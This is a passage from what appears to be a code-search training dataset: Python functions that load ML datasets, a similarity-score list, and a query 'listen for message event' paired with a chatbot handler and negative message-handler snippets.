X_test, y_train_labels, y_valid_labels, y_test_labels = formatData(tetrode_number,BASENAME,CONV)\n print(\"Done!\")\n\n X_train = X_train.reshape(X_train.shape[0],1,X_train.shape[1],X_train.shape[2])\n X_valid = X_valid.reshape(X_valid.shape[0],1,X_valid.shape[1],X_valid.shape[2])\n X_test = X_test.reshape(X_test.shape[0],1,X_test.shape[1],X_test.shape[2])\n\n\n y_train = X_train\n y_valid = X_valid\n y_test = X_test\n\n r={}\n for x,y in zip(X_test,y_test_labels):\n # print(\"x: {}\".format(x))\n # print(\"y: {}\".format(y))\n _y = list(y)\n if int(_y.index(1.0)) not in r:\n r[int(_y.index(1.0))]=[x]\n else:\n r[int(_y.index(1.0))].append(x)\n\n for key in r:\n r[key] = np.asarray(r[key])\n\n\n return dict(\n X_train=X_train,\n y_train=y_train,\n X_valid=X_valid,\n y_valid=y_valid,\n X_test=X_test,\n y_test=y_test,\n labeled_test=r,\n caswells_dim = y_train_labels.shape[-1],\n num_examples_train=X_train.shape[0],\n num_examples_valid=X_valid.shape[0],\n num_examples_test=X_test.shape[0],\n input_shape=X_train.shape,\n output_dim=y_train.shape[-1],\n )", "def load_data_and_labels(self):\n gen = image.ImageDataGenerator()\n target_size = (224,224)\n if self.preprocess:\n print('Preprocessing data...')\n if not os.path.isdir(self.pproc_dir()):\n os.mkdir(self.pproc_dir())\n \n batch_arr = []\n for ld,segment in [(self.train_dir(), 'train'),\n (self.valid_dir(), 'valid')]:\n # TODO(ness): segment = os.basename(ld)\n flowgen = gen.flow_from_directory(\n ld,\n target_size=target_size,\n shuffle=False,\n class_mode=None,\n batch_size=1)\n # Save the batches using method defined in utils.py\n data = np.concatenate([flowgen.next() for i in range(flowgen.n)])\n batches_dir = self.pproc_dir() + segment + '-bc'\n save_array(batches_dir, data)\n \n # Save the classes.\n cls_dir = self.pproc_dir() + segment + '-cl'\n save_array(cls_dir, flowgen.classes)\n \n batch_arr.append((data, flowgen.classes, flowgen.class_indices))\n \n # Set the data.\n self.training_data = batch_arr[0][0]\n self.validation_data = batch_arr[1][0]\n \n # Classes are zero-indexed and represent a category in\n # numerical form. So if the classes are 'dog' and 'cat',\n # the possible class values will be 0 and 1.\n self.trn_classes = batch_arr[0][1]\n self.val_classes = batch_arr[1][1]\n \n # Labels are the one-hot encoded (i.e. categorical)\n # version of the classes. In other words, if there are\n # 5 classes and an element belongs to class 2,\n # its label will be [0,0,1,0,0] (index 1).\n self.training_labels = to_categorical(batch_arr[0][1])\n self.validation_labels = to_categorical(batch_arr[1][1])\n \n # Class indices are dictionaries of the form\n # {'category_name': 0, 'category_name_2: 1}. They\n # make the mapping between numerical class indices and\n # a human-readable category name. They are (should be...)\n # the same for validation and training, so only load them\n # once, after sanity checking.\n self.cindices = batch_arr[0][2]\n print('Done preprocessing.')\n else:\n print('Loading data...')\n # Load the pre-saved data using methods defined in utils.py. See\n # preprocessing branch for the meaning of the data.\n self.training_data = load_array(self.pproc_dir() + 'train-bc')\n self.validation_data = load_array(self.pproc_dir() + 'valid-bc')\n self.trn_classes = load_array(self.pproc_dir() + 'train-cl')\n self.val_classes = load_array(self.pproc_dir() + 'valid-cl')\n self.training_labels = to_categorical(self.trn_classes)\n self.validation_labels = to_categorical(self.val_classes)\n \n # To get the class indices, we create the generator. It's cheap to\n # run since it doesn't actually load all the data.\n flowgen = gen.flow_from_directory(\n self.train_dir(),\n target_size=target_size,\n shuffle=False,\n class_mode=None,\n batch_size=1) \n self.cindices = flowgen.class_indices\n print('Done loading.')", "def load_data():\n X = load_pickle(config['image_paths']['train_images_pickle'])\n y = load_train_labels()\n y = to_categorical(y)\n test_indices = np.random.choice(len(X), int(len(X) * float(config['model']['test_size'])), replace=False)\n X_train = np.asarray([e for idx, e in enumerate(X) if idx not in test_indices])\n X_test = np.asarray([e for idx, e in enumerate(X) if idx in test_indices])\n y_train = np.asarray([e for idx, e in enumerate(y) if idx not in test_indices])\n y_test = np.asarray([e for idx, e in enumerate(y) if idx in test_indices])\n return X_train, y_train, X_test, y_test", "def Train_data():\n print (\"loading train data ...\")\n time_start = time.time()\n data_root = '/media/keziwen/86AA9651AA963E1D'\n with h5py.File(join(data_root, './data/train_real2.h5')) as f:\n data_real = f['train_real'][:]\n num, nt, ny, nx = data_real.shape\n data_real = np.transpose(data_real, (0, 1, 3, 2))\n with h5py.File(join(data_root, './data/train_imag2.h5')) as f:\n data_imag = f['train_imag'][:]\n num, nt, ny, nx = data_imag.shape\n data_imag = np.transpose(data_imag, (0, 1, 3, 2))\n data = data_real+1j*data_imag\n num_train = 15000\n num_validate = 2000\n train_data = data[0:num_train]\n validate_data = data[num_train:num_train+num_validate]\n\n train_data = np.random.permutation(train_data)\n\n time_end = time.time()\n print ('dataset has been created using {}s'.format(time_end-time_start))\n return train_data, validate_data", "def load_data():\n # Load image data from MNIST.\n (train_x, train_y),(eval_x, eval_y) = keras.datasets.mnist.load_data()\n\n # We convert the input data to (60000, 28, 28, 1), float32 and normalize our data values to the range [0, 1].\n train_x = train_x.reshape(train_x.shape[0], train_x.shape[1], train_x.shape[2], 1)\n eval_x = eval_x.reshape(eval_x.shape[0], eval_x.shape[1], eval_x.shape[2], 1)\n\n train_x = train_x.astype('float32')\n eval_x = eval_x.astype('float32')\n train_x /= 255\n eval_x /= 255\n\n # Preprocess class labels \n train_y = train_y.astype(np.int32)\n eval_y = eval_y.astype(np.int32)\n\n train_y = np_utils.to_categorical(train_y, 10)\n eval_y = np_utils.to_categorical(eval_y, 10)\n\n return train_x, train_y, eval_x, eval_y", "def _load_raw_datashards(shard_num, nb_collaborators): \n train_obj = torchvision.datasets.CIFAR10('~/.CIFAR10', train=True, download=True) \n test_obj = torchvision.datasets.CIFAR10('~/.CIFAR10', train=False, download=True) \n x_train = train_obj.data\n y_train = np.asarray(train_obj.targets)\n x_test = test_obj.data\n y_test = np.asarray(test_obj.targets)\n # fix the label dimension to be (N,)\n y_train = y_train.reshape(-1)\n y_test = y_test.reshape(-1) \n \n # create the shards\n X_train_shards = x_train[shard_num::nb_collaborators]\n y_train_shards = y_train[shard_num::nb_collaborators]\n \n X_test_shards = x_test[shard_num::nb_collaborators]\n y_test_shards = y_test[shard_num::nb_collaborators]\n return (X_train_shards, y_train_shards), (X_test_shards, y_test_shards)", "def load_cifar10(directory, normalize=True):\n training_data = []\n training_labels = []\n for i in range(1, 6):\n try:\n d = unpickle(directory + f\"/data_batch_{i}\")\n except FileNotFoundError:\n raise Exception(f\"File 'data_batch_{i}' is not found in the specified directory '{directory}'.\")\n training_data.append(d[b\"data\"])\n training_labels.append(d[b\"labels\"])\n training_data = np.vstack(training_data)\n training_data = np.reshape(training_data, newshape=(-1, 3, 32, 32))\n training_labels = np.concatenate(training_labels)\n training_labels = np.array(list(map(lambda hot: one_hot(10, hot), training_labels)))\n\n try:\n test = unpickle(directory + \"/test_batch\")\n except FileNotFoundError:\n raise Exception(f\"File 'test_batch' is not found in the specified directory '{directory}'.\")\n test_data = np.reshape(test[b\"data\"], newshape=(-1, 3, 32, 32))\n test_labels = np.array(list(map(lambda hot: one_hot(10, hot), test[b\"labels\"])))\n\n try:\n meta = unpickle(directory + \"/batches.meta\")\n except FileNotFoundError:\n raise Exception(f\"File 'batches.meta' is not found in the specified directory '{directory}'.\")\n label_names = meta[b\"label_names\"]\n label_names = list(map(lambda x: x.decode(\"utf-8\"), label_names))\n\n if normalize:\n training_data = training_data / 255\n test_data = test_data / 255\n\n return training_data, training_labels, test_data, test_labels, label_names", "def init_train(self):\n data = self.loader.load_labelled_data(self.conf.split, 'training')\n\n # Initialise unlabelled data iterator\n num_ul = 0\n if self.conf.ul_mix > 0:\n ul_data = self.loader.load_unlabelled_data(self.conf.split, 'all')\n\n # calculate number of unlabelled images as a proportion of the labelled images\n num_ul = int(data.size() * self.conf.ul_mix)\n num_ul = num_ul if num_ul <= ul_data.size() else ul_data.size()\n log.info('Sampling %d unlabelled images out of total %d.' % (num_ul, ul_data.size()))\n ul_data.sample(num_ul)\n self.gen_X_U = data_utils.generator(self.conf.batch_size, 'overflow', ul_data.images)\n\n # Initialise labelled data iterator\n assert self.conf.l_mix >= 0\n\n # calculate number of labelled images\n num_l = int(data.size() * self.conf.l_mix)\n num_l = num_l if num_l <= data.size() else data.size()\n log.info('Using %d labelled images out of total %d.' % (num_l, data.size()))\n train_images = data.images[:num_l]\n train_masks = data.masks[:num_l]\n\n self.conf.unlabelled_image_num = num_ul\n self.conf.labelled_image_num = num_l\n self.conf.data_len = num_ul if num_ul > num_l else num_l\n self.conf.batches = int(np.ceil(self.conf.data_len / self.conf.batch_size))\n self.conf.save()\n\n self.gen_X_L = data_utils.generator(self.conf.batch_size, 'overflow', train_images, train_masks)\n\n # Initialise real masks iterator for discriminator training, using the real masks from the data CV split.\n self.other_masks = data_utils.generator(self.conf.batch_size, 'overflow', data.masks + 0)", "def load_data(path='alex_mnist_data.npz'):\n with np.load(path, allow_pickle=True) as f:\n x_train, y_train = f['alex_train_data'], f['alex_train_label']\n x_test, y_test = f['alex_test_data'], f['alex_test_label']\n return (x_train, y_train),(x_test, y_test)", "def learnDataset(self, data_loader):\n\n print(\"learning dataset\")\n # we have 127940 sentences in total\n count = 0\n for sample in data_loader:\n input_sentence = sample[\"input\"][0]\n target_sentence = sample[\"target\"][0]\n\n # NOTE: target_word & input_word are actually indecies of words, instead of word strings\n # NOTE: the first word has index 1\n first_target = int(target_sentence[1])\n first_input = int(input_sentence[1])\n\n self.emiss_factors[0][(first_input, first_target)] += 1\n\n prev_target = first_target\n for word_idx in range(2, 16):\n # note that word_idx is 0 is always <BOS>\n target_word = int(target_sentence[word_idx])\n input_word = int(input_sentence[word_idx])\n\n self.emiss_factors[word_idx - 1][(input_word, target_word)] += 1\n self.trans_factors[word_idx - 2][(prev_target, target_word)] += 1\n prev_target = target_word\n\n print(\"{}/127940\".format(count), end = \"\\r\")\n count += 1\n print(\"127940/127940\")\n\n # all data updated, no need to do any insertion\n for i in range(15):\n self.emiss_factors[i].fixed()\n for i in range(14):\n self.trans_factors[i].fixed()", "def load_data(filename):\n assert os.path.exists(filename)==True\n dat = scipy.io.loadmat(filename)\n inputs = dat['inputs']\n #print len(inputs)\n targets = dat['targets']\n #print len(targets)\n assert len(inputs)==len(targets)\n\n global alldata\n global indim \n global outdim\n\n indim = len(inputs[0])\n outdim = 1\n #print indim\n alldata = ClassificationDataSet(indim, outdim, nb_classes = 8)\n alldata.setField('input',inputs)\n alldata.setField('target',targets)\n\n assert len(alldata['input'])==len(alldata['target'])\n print type(alldata)", "def create_data(data_size,heme, nucleotide, control, steroid,data_total,path_to_data):\n\n os.chdir(path_to_data)\n\n x_array = np.zeros(shape = (data_size,14,32,32,32))\n\n y_array = np.zeros(shape = data_size)\n\n print(\"data size = \", data_size)\n\n #training set :\n\n file_count = 0\n\n for file in data_total:\n\n y_array[file_count]= find_class(str(file), heme, nucleotide, control, steroid)\n\n x_array[file_count] = np.load(str(file+\".npy\"))\n\n file_count+=1\n\n\n return (x_array, y_array)", "def load_aal_atlas(atlas_dir, aal_basename=\"ROI_MNI_V4\", verbose=0):\n \n if not osp.isdir(atlas_dir):\n raise ValueError(\"%s not a directory\" % atlas_dir)\n\n aal_img_name = glob.glob(osp.join(atlas_dir, aal_basename+\"*.nii\"))[0]\n aal_labels_name = glob.glob(osp.join(atlas_dir, aal_basename+\"*.txt\"))[0]\n aalimg = nib.load(aal_img_name)\n data = aalimg.get_data()\n\n labels = []\n with open(aal_labels_name) as f:\n for line in f.read().splitlines():\n labels.append(line.split(\"\\t\"))\n \n # labels is now a list of [\"short name\", \"long name\", \"ROI_value\"]\n # [['FAG', 'Precentral_L', '2001'], ['FAD', 'Precentral_R', '2002'], ...]\n n_roi = len(labels)\n split_data = np.ndarray(aalimg.shape + (n_roi,), dtype=bool)\n split_data.fill(False)\n \n only_name_labels = []\n roi_size = []\n for idx,lab in enumerate(labels):\n only_name_labels.append(lab[1])\n split_data[...,idx] = data==int(lab[2])\n roi_size.append(split_data[...,idx].sum())\n \n return (split_data, aalimg.get_affine(), only_name_labels, roi_size)", "def load_pascal(data_dir, split='train'):\n # Wrote this function\n # idx = 0\n # if idx >20:\n # idx+=1\n # break\n \"\"\"\n print(\"Begin Load Images ------------------------------------\")\n images = []\n # images_dict -> key: img_file_idx, value: rgb image ndarray (256*256*3)\n images_dict = {}\n # count\n for infile in glob.glob(\"./VOCdevkit/VOC2007/JPEGImages/*.jpg\"):\n # reshape the images to 256*256*3\n file, ext = os.path.splitext(infile)\n file_idx = file[-6:]\n\n try:\n im = Image.open(infile)\n resized_img = im.resize((256, 256), Image.ANTIALIAS)\n resized_arr = np.array(resized_img)\n images_dict[file_idx] = resized_arr.astype(np.float32)\n except IOError:\n print(\"Error\")\n\n save_obj(images_dict,\"images_dict\")\n \"\"\"\n # label_mat: 2d array, each annotation file is one label_col, multiple label_col mean multiple annotation files\n label_mat = []\n weight_mat = []\n image_mat = []\n\n images_dict = load_obj(\"images_dict\")\n print(\"Return Load Images ------------------------------------\")\n\n # for filename in os.listdir(\"./VOCdevkit/VOC2007/ImageSets/Main/\"):\n for filename in enumerate(CLASS_NAMES):\n\n with open(\"./VOCdevkit/VOC2007/ImageSets/Main/\"+filename[1] +\"_\"+split+\".txt\") as fp:\n print(fp)\n image_mat = []\n label_col = []\n weight_col = []\n line = fp.readline()\n cnt = 1\n while line:\n\n label_idx = line.strip()[:-3]\n try:\n # print(\"Line {}: {}\".format(label_idx, type(label_idx)))\n # Be aware!! '000005 ' is different from '000005', there is a space in the first string!!!\n # label_idx = '000005 ' label_idx[:-1]='000005'\n image_mat.append(images_dict[label_idx])\n except IOError:\n print(\"Error Line {}: {}\".format(label_idx, type(label_idx)))\n\n label_flag = int(line.strip()[-2:])\n\n if label_flag is 0 or label_flag is -1:\n label_col.append(np.int32(0))\n else:\n label_col.append(np.int32(1))\n\n if label_flag is 1 or label_flag is -1:\n weight_col.append(np.int32(1))\n else:\n weight_col.append(np.int32(0))\n\n line = fp.readline()\n cnt += 1\n np_label_col = np.asarray(label_col)\n label_mat.append(np_label_col)\n # print(np.shape(label_mat))\n np_weight_col = np.asarray(weight_col)\n weight_mat.append(np_weight_col)\n\n # print('image_mat {}: label_mat {}'.format(np.shape(image_mat), np.shape(label_mat)))\n np_image_mat = np.asarray(image_mat)\n np_label_mat = np.asarray(label_mat)\n np_weight_mat = np.asarray(weight_mat)\n # print('np_image_mat {}: np_label_mat {}'.format(np.shape(np_image_mat), np.shape(np_label_mat)))\n np_trans_label_mat = np_label_mat.transpose()\n np_trans_weight_mat = np_weight_mat.transpose()\n # print(np.shape(np_label_mat))\n # print(np.shape(np_weight_mat))\n print('np_trans_label_mat {}: np_trans_weight_mat {}'.format(np.shape(np_trans_label_mat), np.shape(np_trans_weight_mat)))\n print(\"Return Load Weights and Labels ------------------------------------\")\n return np_image_mat, np_trans_label_mat, np_trans_weight_mat", "def load_preprocess_training_batch(batch_id, batch_size):\r\n filename = 'preprocess_batch_' + str(batch_id) + '.p'\r\n features, labels = pickle.load(open(filename, mode='rb'))\r\n# labels = np.argmax(labels,1)\r\n# num = len(labels)\r\n# arr = np.zeros((num, 1))\r\n# for i in range(num):\r\n# arr[i][0] = labels[i]\r\n# np.reshape(features,(2500,150528))\r\n# ind = [i for i in range(len(features))]\r\n# random.shuffle(ind)\r\n# features = features[ind]\r\n# labels = labels[ind]\r\n\r\n # Return the training data in batches of size <batch_size> or less\r\n return features[0:batch_size],labels[0:batch_size]", "def test_cached_dataloader(self):\n\n v = [\"data\", \"target\", \"model_out_sqnet\"]\n\n for data, target in self.train_loader:\n b, c, h, w = data[v[0]].shape\n assert data[v[1]].shape == (b, )\n assert data[v[2]].shape == (b, 100)\n assert data[v[1]].shape == target.shape", "def __init__(self, directory, dataset, B_SIZE = 32):\n \n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n \n self.directory = directory\n self.dataset = dataset\n self.batch_size = B_SIZE\n self.hidden_dim = 64\n self.embedding_dim = 300\n \n all_data = pickle.load(open(directory + dataset + \"/data.p\", \"rb\"))\n \n self.w2ix = all_data.w2ix\n self.vocab_size = len(self.w2ix) \n \n self.mask_list = []\n self.mask_tokens = [\"<PAD>\", \"<SOS>\", \"<EOS>\", \".\"]\n \n for item in self.mask_tokens:\n \n if item in self.w2ix:\n \n self.mask_list.append(self.w2ix[item])\n \n self.pretrained_embeds = all_data.pretrained_embeds\n \n \n # In[4]:\n \n \n x_train, y_train = zip(*all_data.train)\n x_dev, y_dev = zip(*all_data.dev)\n x_test, y_test = zip(*all_data.test)\n \n print(\"\\nVocab size:\", len(self.w2ix),\n \"\\nTraining size:\", len(y_train),\n \"\\nDev size:\", len(y_dev),\n \"\\nTest size:\", len(y_test))\n \n # In[5]:\n \n self.output_size= len(np.unique(y_train))\n \n print(\"\\nOutput dimension: \", self.output_size, \"\\n\")\n \n \n self.sequence_length = all_data.sequence_length()\n \n if dataset == \"mimicanemia\":\n \n \tself.sequence_length = 2200\n \n print(\"--Sequence length :\", self.sequence_length, \"\\n\")\n \n # In[10]:\n \n from modules.utils import padder\n \n x_train_pad, train_lengths = padder(x_train, pad_len = self.sequence_length)\n x_dev_pad, dev_lengths = padder(x_dev, pad_len = self.sequence_length)\n x_test_pad, test_lengths = padder(x_test, pad_len = self.sequence_length)\n \n \n # In[11]:\n \n x_train_pad = torch.LongTensor(x_train_pad)#.to(device)\n x_dev_pad = torch.LongTensor(x_dev_pad)#.to(device)\n x_test_pad = torch.LongTensor(x_test_pad)#.to(device)\n train_lengths = torch.LongTensor(train_lengths)#.to(device)\n dev_lengths = torch.LongTensor(dev_lengths)#.to(device)\n test_lengths = torch.LongTensor(test_lengths)#.to(device)\n y_train = torch.LongTensor(y_train)#.to(device)\n y_dev = torch.LongTensor(y_dev)#.to(device)\n y_test = torch.LongTensor(y_test)#.to(device)\n \n \n # In[12]:\n \n \n training_prebatch = list(zip(x_train_pad, train_lengths, y_train))\n dev_prebatch = list(zip(x_dev_pad, dev_lengths, y_dev))\n testing_prebatch = list(zip(x_test_pad, test_lengths, y_test))\n \n \n training_prebatch = sorted(training_prebatch, key = lambda x : x[1], reverse = False)\n dev_prebatch = sorted(dev_prebatch, key = lambda x : x[1], reverse = False)\n testing_prebatch = sorted(testing_prebatch, key = lambda x : x[1], reverse = False)\n \n # In[13]:\n \n ### removing sos and eos only sentences\n \n train_prebatch = [x for x in training_prebatch if x[1] > 2]\n dev_prebatch = [x for x in dev_prebatch if x[1] > 2]\n test_prebatch = [x for x in testing_prebatch if x[1] > 2]\n \n \n self.training = DataLoader(train_prebatch, batch_size = self.batch_size, \n shuffle = True, pin_memory = False)\n \n self.development = DataLoader(dev_prebatch, batch_size = self.batch_size, \n shuffle = False, pin_memory = False)\n \n \n self.testing = DataLoader(test_prebatch, batch_size = self.batch_size, \n shuffle = False, pin_memory = False)", "def data_prepare(raw_datapath, save_path, sample_size=256):\n ## data path\n data_path = raw_datapath\n ## sample size\n data_size = sample_size\n\n ## data lists\n pts = ['100', '104', '108', '113', '117', '122', '201', '207', '212', '217', '222', '231',\n '101', '105', '109', '114', '118', '123', '202', '208', '213', '219', '223', '232',\n '102', '106', '111', '115', '119', '124', '203', '209', '214', '220', '228', '233',\n '103', '107', '112', '116', '121', '200', '205', '210', '215', '221', '230', '234']\n\n ## map the ~19 classes to 5 classes\n ## according to the paper https://arxiv.org/pdf/1805.00794.pdf\n mapping = {'N': 0, 'L': 0, 'R': 0, 'e': 0, 'j': 0, 'B': 0, # N = 0\n 'A': 1, 'a': 1, 'J': 1, 'S': 1, # S = 1\n 'V': 2, 'E': 2, 'r': 2, 'n': 2, # V = 2\n 'F': 3, # F = 3\n '/': 4, 'f': 4, 'Q': 4, '?': 4} # Q = 4\n ignore = ['+', '!', '[', ']', 'x', '~', '|', '\"']\n\n ## we split the each set of the data into size 256( which we can see the ecg pulse, just one pulse)\n def dataSaver(dataset=pts, data_size=data_size):\n input_size = data_size ## default\n\n def dataprocess():\n ecg = np.zeros((1, input_size))\n label = np.zeros((1, 1))\n for num in tqdm(dataset):\n print(num, 'now')\n idx = 0 ## count for the matrixes\n record = wfdb.rdrecord(data_path + num, smooth_frames=True)\n\n ## normalize the data ecg\n signals0 = np.nan_to_num(record.p_signal[:, 0])\n # signals1 = np.nan_to_num(record.p_signal[:, 1])\n min_max_scaler = preprocessing.MinMaxScaler()\n signals0 = min_max_scaler.fit_transform(signals0.reshape(-1, 1))\n # signals1 = min_max_scaler.fit_transform(signals1.reshape(-1, 1))\n signals0 = signals0.reshape(-1)\n # signals1 = signals1.reshape(-1)\n\n ## find peaks # R-peaks\n ## we only use the channel 0\n peaks, _ = find_peaks(signals0, distance=150)\n\n X = np.zeros((len(peaks), input_size))\n Y = np.zeros((len(peaks), 1))\n\n # skip a first peak to have enough range of the sample\n # in the for loop, we look for the annotation\n for peak in tqdm(peaks[1:-1]):\n start, end = peak - input_size // 2, peak + input_size // 2\n start = max([0, start])\n end = min([len(signals0), end])\n ann = wfdb.rdann(data_path + num, extension='atr', sampfrom=start, sampto=end,\n return_label_elements=['symbol'])\n symbol = ann.symbol\n count = 0\n if len(symbol) != 1:\n for sym in symbol:\n if sym in ignore:\n count += 1\n continue\n elif sym == 'N':\n continue\n else:\n symbol = sym\n break\n if count > 0 and len(symbol) > 1:\n symbol = '+'\n elif len(symbol) > 1:\n symbol = 'N'\n elif len(symbol) == 0:\n symbol = '+'\n assert len(symbol) <= 1, \"the symbol is not only one.{} len\".format(len(symbol))\n\n if len(symbol) == 1:\n for ss in symbol:\n if ss in ignore:\n continue\n else:\n Y[idx, 0] = mapping[ss]\n sig = signals0[start:end]\n X[idx, :len(sig)] = sig\n idx += 1\n ecg = np.concatenate((ecg, X), axis=0)\n label = np.concatenate((label, Y), axis=0)\n ecg = ecg[1:, :]\n label = label[1:, :]\n ecg = pd.DataFrame(ecg)\n label = pd.DataFrame(label)\n\n return ecg, label\n ecg, label = dataprocess()\n return ecg, label\n\n ecg, label = dataSaver(pts)\n ecg_path = save_path + \"/ecg_signal_{}.csv\".format(data_size)\n label_path = save_path + \"/label_{}.csv\".format(data_size)\n ecg.to_csv(ecg_path, index=None, header=None)\n label.to_csv(label_path, index=None, header=None)\n return ecg, label", "def prepare(dataset):\n dataset = dataset.reshape(dataset.shape[0], 1, 28, 28)\n dataset = dataset.astype('float32')\n dataset /= 255\n return dataset", "def get_loader(m,image_dir, attr_path, selected_attrs, crop_size=178, image_size=128, \n batch_size=16, dataset='CelebA', mode='train', num_workers=1):\n transform = []\n transform.append(T.ToTensor())\n #transform.append(T.Normalize(mean=[0.5], std=[0.5]))\n transform = T.Compose(transform)\n\n if dataset == 'CelebA':\n dataset = CelebA(image_dir, attr_path, selected_attrs, transform, mode)\n elif dataset == 'RaFD':\n if m==10:\n dataset = ImageFolder1(image_dir, transform,mode)\n else:\n dataset = ImageFolder(image_dir, transform,mode)\n \n data_loader = data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=(mode=='train'),\n num_workers=num_workers)\n return data_loader", "def _load_dataset(self, path):\n\t\twhile True:\n\t\t\t\n\t\t\ttry:\n\t\t\t\tX_train = np.load(\"data/X_train.npy\")\n\t\t\t\tX_val = np.load(\"data/X_val.npy\")\n\t\t\t\tY_train = np.load(\"data/Y_train.npy\")\n\t\t\t\tY_val = np.load(\"data/Y_val.npy\")\n\t\t\t\tbreak\n\n\t\t\texcept FileNotFoundError:\n\n\t\t\t\tdata_temp = np.zeros((50000,64,64,3))\n\t\t\t\tlabel_temp = []\n\n\t\t\t\tfor i in range(5):\n\n\t\t\t\t\tfile = path + str(i+1)\n\t\t\t\t\twith open(file, 'rb') as fo:\n\t\t\t\t\t\ttemp_element = pickle.load(fo, encoding='bytes')\n\n\t\t\t\t\ttemp_data = temp_element[b'data']\n\t\t\t\t\tlabel_temp.extend(temp_element[b'labels'])\n\n\t\t\t\t\tfor j in range(10000):\n\t\t\t\t\t\tdata_temp[j+(i*10000)] = self._reshape(temp_data[j])\n\n\t\t\t\tlabel_temp = np.eye(10)[np.array(label_temp)]\n\n\t\t\t\tnp.random.seed(123)\n\t\t\t\tpermutations = list(np.random.permutation(50000))\n\t\t\t\tX = data_temp[permutations, :, : , :] \n\t\t\t\tY = label_temp[permutations, :]\n\t\t\t\tX_train = X[0:40000, :, :, :] \n\t\t\t\tY_train = Y[0:40000, :]\n\t\t\t\tX_val = X[40000:50000, :, :, :] \n\t\t\t\tY_val = Y[40000:50000, :]\n\n\t\t\t\tnp.save(\"./data/X_train\", X_train)\n\t\t\t\tnp.save(\"./data/X_val\", X_val)\n\t\t\t\tnp.save(\"./data/Y_train\", Y_train)\n\t\t\t\tnp.save(\"./data/Y_val\", Y_val)\n\t\t\t\tbreak\n\n\t\treturn X_train, X_val, Y_train, Y_val" ]
[ "0.7416813", "0.6421557", "0.6321571", "0.60597914", "0.5983696", "0.5967315", "0.5948484", "0.59380203", "0.5907359", "0.5897862", "0.58657163", "0.58646065", "0.5861289", "0.58553", "0.58469105", "0.577485", "0.5769538", "0.5751676", "0.574995", "0.57490104", "0.5744094", "0.57396305", "0.5732606", "0.57227415", "0.56898874", "0.568698", "0.56710476", "0.5668816", "0.56482786", "0.5638793", "0.563711", "0.5632243", "0.5625967", "0.562593", "0.5618013", "0.56117654", "0.5609205", "0.5608604", "0.5599277", "0.5594843", "0.559322", "0.5589608", "0.5575619", "0.5571026", "0.55673754", "0.55615956", "0.555366", "0.55532426", "0.555229", "0.55474657", "0.5536288", "0.5536013", "0.55331415", "0.55299747", "0.5527531", "0.5526474", "0.5526104", "0.5524737", "0.55190784", "0.5516717", "0.5514169", "0.5513925", "0.55071664", "0.55064833", "0.54975945", "0.54910827", "0.54844326", "0.54843134", "0.5471428", "0.5467664", "0.5460486", "0.54601604", "0.5457895", "0.54537004", "0.5451066", "0.54459757", "0.5445256", "0.54447234", "0.54437953", "0.5443104", "0.54369015", "0.54340065", "0.54311836", "0.5429621", "0.5427722", "0.54249346", "0.54218954", "0.5421273", "0.54162335", "0.54152423", "0.5414264", "0.5410717", "0.5410546", "0.5407391", "0.54058534", "0.54042894", "0.54013336", "0.5400514", "0.5397369", "0.5394984" ]
0.72671366
1
listen for message event
async def on_message(self, msg: Message): from_contact = msg.talker() text = msg.text() room = msg.room() if text == '#ding': conversation: Union[ Room, Contact] = from_contact if room is None else room await conversation.ready() await conversation.say('dong') file_box = FileBox.from_url( 'https://ss3.bdstatic.com/70cFv8Sh_Q1YnxGkpoWK1HF6hhy/it/' 'u=1116676390,2305043183&fm=26&gp=0.jpg', name='ding-dong.jpg') await conversation.say(file_box)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _handle_message(self, msg):\n self.event('message', msg)", "def on_message(data):\n pass", "def event_in_cb(self, msg):\n self.event = msg.data", "def on_message(self, message):\n print \"Client %s received a message : %s\" % (self.id, message)", "def onMessage(self, message):\n raise NotImplementedError", "def msg_event(self, event):\r\n pass", "def receive_message(self, message):", "def on_message(self, message):\n log.debug(\"Protocol got message {message}\", message=message)\n if message['type'] == \"change\":\n self.handler.process_packet(message['packet'])\n self.send_packet()\n elif message['type'] == \"chat\":\n self.on_chat_message(message)\n elif message['type'] == \"action\":\n self.on_action(message)\n else:\n log.warn(\"Unrecognized message type {type}\", type=message['type'])", "def on_message(self, message):\n print \"Client %s received a message : %s\" % (self.id, message)\n self.write_message(\"Conn!\")", "def on_message(self,ws,message):\n pass", "def listen(client, main):\n\n @client.event\n async def on_message_edit(old, message):\n main.message_handler(message, True)", "def on_message(self, event):\n self.response = event.message\n self.connection.container.yield_() # Wake up the wait() loop to handle the message.", "def receive_message(self, message):\r\n return", "def handleMessage(msg):", "def message_callback(self, message):\n pass", "def handle_message(self, message):", "def receive(self, message):", "def on_message(self, data):\n req = json.loads(data)\n self.serve(req)", "def on_message(self, data):\n req = json.loads(data)\n self.serve(req)", "def handle_msg(msg):\n if comm._msg_callback:\n comm._msg_callback(msg)", "def callback_message(self, message):\n pass", "def callback_message(self, message):\n pass", "def on_message(self, message):\n #print(f\"This message was sent: {message}\") # Writes to the console window (server side)\n self.write_message(f\"This message was sent: {message}\") # Writes message to sender", "def handle_message(self, msg):\n pass", "def _on_message(self, message):\n print(\"RECEIVED on \" + self.session_name + \":\")\n message_json = json.loads(message)\n print(json.dumps(message_json, sort_keys=True, indent=2, separators=(',', ':')))\n\n for singleMsg in message_json:\n self._process_message(singleMsg)", "def handle(self, message):\n print(\"You received a message:\")\n print(message)\n # Overwrite this function to do something with the message!", "async def on_message(self, message: \"steam.Message\") -> None:", "def _on_message(self, raw_msg):\n strmsg = raw_msg.decode()\n msg = json.loads(strmsg)\n\n print(msg)\n\n if self._handlers.get(msg['msgid']):\n for handler in self._handlers[msg['msgid']]:\n handler.handle(msg)", "def received_message(self, m):\n self.receiver.handle_message(m)", "def handle(self, message):", "def on_msg(self, callback):\n self._msg_callback = callback", "def listen_for_any_message(self, msg, match):\n question=\"{}\".format(msg)\n return self.cbmodel.get_response(question)", "def on_receive(self, msg):\n raise NotImplementedError", "def receive(self, msg):\n pass", "def event_receive(self,event):\n\n pass", "def on_message(self, message):\n self.write_message(u\"%s\" % message)", "def listen():\n msg = MSG()\n ctypes.windll.user32.GetMessageA(ctypes.byref(msg), 0, 0, 0)", "def listen():\n msg = MSG()\n ctypes.windll.user32.GetMessageA(ctypes.byref(msg), 0, 0, 0)", "def on_message(client1, userdata, message):\n print(\"message received \" ,str(message.payload.decode(\"utf-8\")))", "def listen_to_message(**payload):\n\n data = payload['data']\n\n try:\n message = data['text']\n user = data['user']\n message_id = data['client_msg_id']\n time = 